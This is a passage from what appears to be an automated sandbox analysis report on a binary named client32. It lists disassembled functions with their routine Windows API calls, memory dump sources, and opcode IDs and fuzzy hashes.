                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: BeepMessage
                                                                                • String ID:
                                                                                • API String ID: 2359647504-0
                                                                                • Opcode ID: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                • Instruction ID: 4a014cbc1c5237b7f0567ced4e31e585fd70e1907f22ab32dda50b08ea234cb0
                                                                                • Opcode Fuzzy Hash: 7f1ecbc06fcb22de26d86451293ac8fe5d9409e3203d5f6e821324ac06cc55b8
                                                                                • Instruction Fuzzy Hash: 5831C275640610ABE728CF54C882F77B3F8EF84B10F01859AF95687685E3B5E950C3B1
                                                                                Function 11049130 Relevance: 6.1, APIs: 4, Instructions: 112windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 11040700: IsWindow.USER32(?), ref: 11040720
                                                                                  • Part of subcall function 11040700: GetClassNameA.USER32(?,?,00000040), ref: 11040731
                                                                                • _malloc.LIBCMT ref: 110491DD
                                                                                • _memmove.LIBCMT ref: 110491EA
                                                                                • SendMessageTimeoutA.USER32(?,0000004A,00040310,?,00000002,00001388,?), ref: 11049224
                                                                                • _free.LIBCMT ref: 1104922B
                                                                                  • Part of subcall function 11048FE0: wsprintfA.USER32 ref: 11049013
                                                                                  • Part of subcall function 11048FE0: WaitForInputIdle.USER32(?,00002710), ref: 11049099
                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490AC
                                                                                  • Part of subcall function 11048FE0: CloseHandle.KERNEL32(?), ref: 110490B5
                                                                                  • Part of subcall function 11048FE0: Sleep.KERNEL32(00000014), ref: 110490D1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$ClassIdleInputMessageNameSendSleepTimeoutWaitWindow_free_malloc_memmovewsprintf
                                                                                • String ID:
                                                                                • API String ID: 176360892-0
                                                                                • Opcode ID: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                • Instruction ID: d41a6b91d128f2eeea48cc74d118894cce712679c930bdd2d1ac7c58a8e7d684
                                                                                • Opcode Fuzzy Hash: ff22a9ddfc9956f02424ec2608c6f13a06eca4d3def8f93d8689db34ce88e07c
                                                                                • Instruction Fuzzy Hash: 60316075E0061AABDB04DF94CD81BEEB3B8FF48718F104179E915A7684E731AE05CBA1
                                                                                Function 110297F0 Relevance: 6.1, APIs: 4, Instructions: 104sleepthreadwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateThread.KERNEL32(00000000,00001000,11027690,00000000,00000000,111EE468), ref: 11029813
                                                                                • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029832
                                                                                • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029854
                                                                                • Sleep.KERNEL32(00000032,?,1102B0F3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102985C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: SleepThread$CreateMessagePost
                                                                                • String ID:
                                                                                • API String ID: 3347742789-0
                                                                                • Opcode ID: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                • Instruction ID: 2ae3116f5df8233203c0b5b7c047d092e18a9fbb085bfb1a1d8cc4b180184980
                                                                                • Opcode Fuzzy Hash: fda338b6a51c78fe6c2f886b68065117b2ed91385ddfdaae507fd395cc0aabb8
                                                                                • Instruction Fuzzy Hash: F331C576E43232EBE212DBD9CC80FB6B798A745B68F514135F928972C8D2706841CFD0
                                                                                Function 11179775 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111797A9
                                                                                • __isleadbyte_l.LIBCMT ref: 111797DC
                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117980D
                                                                                • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,1117A3D8,00000109,00BFBBEF,00000003), ref: 1117987B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                • Instruction ID: dd7da2bd4d1e27f38930cbdbffb8ca2b0741d821671db88b966082c1cf8912a5
                                                                                • Opcode Fuzzy Hash: 8a143442f0c1ddc808179669c8bda0f547e04561d024046af250b3c99ddd2ce0
                                                                                • Instruction Fuzzy Hash: 1331AE31A0029EEFEB01DF64C9849AEFFA6EF01330F1585A9E4648B290F730D954CB51
                                                                                Function 110B3700 Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000002C,1B702977,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B372F
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE10,?,?,?,00000000), ref: 110B376F
                                                                                • SetEvent.KERNEL32(?), ref: 110B37EA
                                                                                • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B37F1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                • String ID:
                                                                                • API String ID: 3394196147-0
                                                                                • Opcode ID: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                • Instruction ID: 8acebb29280036c6a802c58c088d91b2f5c0a2bed23f5f36a778171c733041f7
                                                                                • Opcode Fuzzy Hash: 41462067ee8128c784213e06cad4e855516fce30d8963978b3823cfd81d7b6d6
                                                                                • Instruction Fuzzy Hash: BC314A75A44B059FD325CF69C980B9AFBE4FB48314F10862EE85AC7B50EB34A850CB90
                                                                                Function 11043660 Relevance: 6.1, APIs: 4, Instructions: 84windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 110684E0: EnterCriticalSection.KERNEL32(?,1B702977,00000000,00002710,00000001,11027140,1B702977,00000000,00002710,?,?,00000000,11182BE8,000000FF,?,110294CE), ref: 1106858A
                                                                                • SendMessageA.USER32(?,000006D4,00000000,00000000), ref: 110436CA
                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 110436D1
                                                                                • IsWindow.USER32(00000000), ref: 110436DE
                                                                                • GetWindowRect.USER32(00000000,1104A5A0), ref: 110436F5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Window$CriticalEnterLongMessageRectSectionSend
                                                                                • String ID:
                                                                                • API String ID: 3558565530-0
                                                                                • Opcode ID: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                • Instruction ID: d8135c0911b88fc1f510a9c52ef20d21577c3519517ef8ed33f3b43d0edb38f0
                                                                                • Opcode Fuzzy Hash: 7a348eb1ebbebf4d087ed6f90251ea71c232aa61dd705a63114693f89344e778
                                                                                • Instruction Fuzzy Hash: 3121A276E45259ABD714CF94DA80B9DF7B8FB45724F204269E82597780DB30A900CB54
                                                                                Function 110B3810 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • EnterCriticalSection.KERNEL32(0000002C,1B702977,?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B383F
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B385E
                                                                                • SetEvent.KERNEL32(?,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38A4
                                                                                • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,Function_0018B2A8,000000FF,?,1103DE81,?), ref: 110B38AB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CriticalSection$Leave$EnterEvent
                                                                                • String ID:
                                                                                • API String ID: 3394196147-0
                                                                                • Opcode ID: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
                                                                                • Instruction ID: 58af85e25f85a47ca3d7134065c146d8b9d4bc60aa5d6e9c2c74ed7e6f1a2d6e
                                                                                • Opcode Fuzzy Hash: 2035c8d51027f8a8a2080d74f0c386d41a95bf140d8a0374962db8ad330c7d77
                                                                                • Instruction Fuzzy Hash: 1C21DF72A047089FD315CFA8D884B9AF7E8FB48315F104A3EE816C7A04E739B404CB94
                                                                                Function 11143070 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetBkColor.GDI32(?,?), ref: 11143091
                                                                                • SetRect.USER32(?,?,?,?,?), ref: 111430A9
                                                                                • ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 111430C0
                                                                                • SetBkColor.GDI32(?,00000000), ref: 111430C8
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Color$RectText
                                                                                • String ID:
                                                                                • API String ID: 4034337308-0
                                                                                • Opcode ID: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                • Instruction ID: e9225e88152d902865c43eb673e3150d6d7e7d22167fd17714d79550e5345a2a
                                                                                • Opcode Fuzzy Hash: 26f6cc05d1df662940a62fe5a538b52049d671c1388398b7ccd782556aa038f2
                                                                                • Instruction Fuzzy Hash: 0C012C7264021CBBDB04DEA8DD81FEFB3ACEF49604F104159FA15A7280DAB0AD018BA5
                                                                                Function 110675A0 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetEvent.KERNEL32 ref: 110675BB
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 110675EC
                                                                                • DispatchMessageA.USER32(?), ref: 110675F6
                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 11067604
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Message$Peek$DispatchEvent
                                                                                • String ID:
                                                                                • API String ID: 4257095537-0
                                                                                • Opcode ID: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                • Instruction ID: aec9ad63bee144445ad482119ba180fbd35a23c038e7556534d76a428b5108da
                                                                                • Opcode Fuzzy Hash: 3db10011ce53d706413e1f321e5ef86fa62babbb723f360e03787fab8b25e9f7
                                                                                • Instruction Fuzzy Hash: E701B171A40205ABE704DE94CC81F96B7ADAB88714F5001A5FA14AF1C5EBB5A541CBF0
                                                                                Function 1115F1F0 Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GlobalDeleteAtom.KERNEL32(00000000), ref: 1115F208
                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F212
                                                                                • GlobalDeleteAtom.KERNEL32 ref: 1115F21C
                                                                                • SetWindowLongA.USER32(?,000000FC,?), ref: 1115F22C
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                • Associated: 0000000D.00000002.2691777406.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2704734769.0000000011194000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708057166.00000000111E2000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708775424.00000000111F1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000111F7000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001120B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001125D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.0000000011288000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001129E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112AD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.00000000112DF000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                • Associated: 0000000D.00000002.2708951110.000000001132B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_11000000_client32.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AtomDeleteGlobal$LongWindow
                                                                                • String ID:
                                                                                • API String ID: 964255742-0
                                                                                • Opcode ID: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                • Instruction ID: 220dc2ec1870e2cd5bb434e19042b50d90bfbecd9004e1d9cbcb935e023cb0cc
                                                                                • Opcode Fuzzy Hash: 6d1c3e4c7ba79be894aa668b9e160f569f6102aeba86935b87fce5edf1bf1130
                                                                                • Instruction Fuzzy Hash: 97E065B910423697C7149F6AAC40D72F3ECAF98614715452DF175C3594C778D445DB70
                                                                                Function 11007255 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110073A7
                                                                                • SetFocus.USER32(?), ref: 11007403
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.2691846537.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
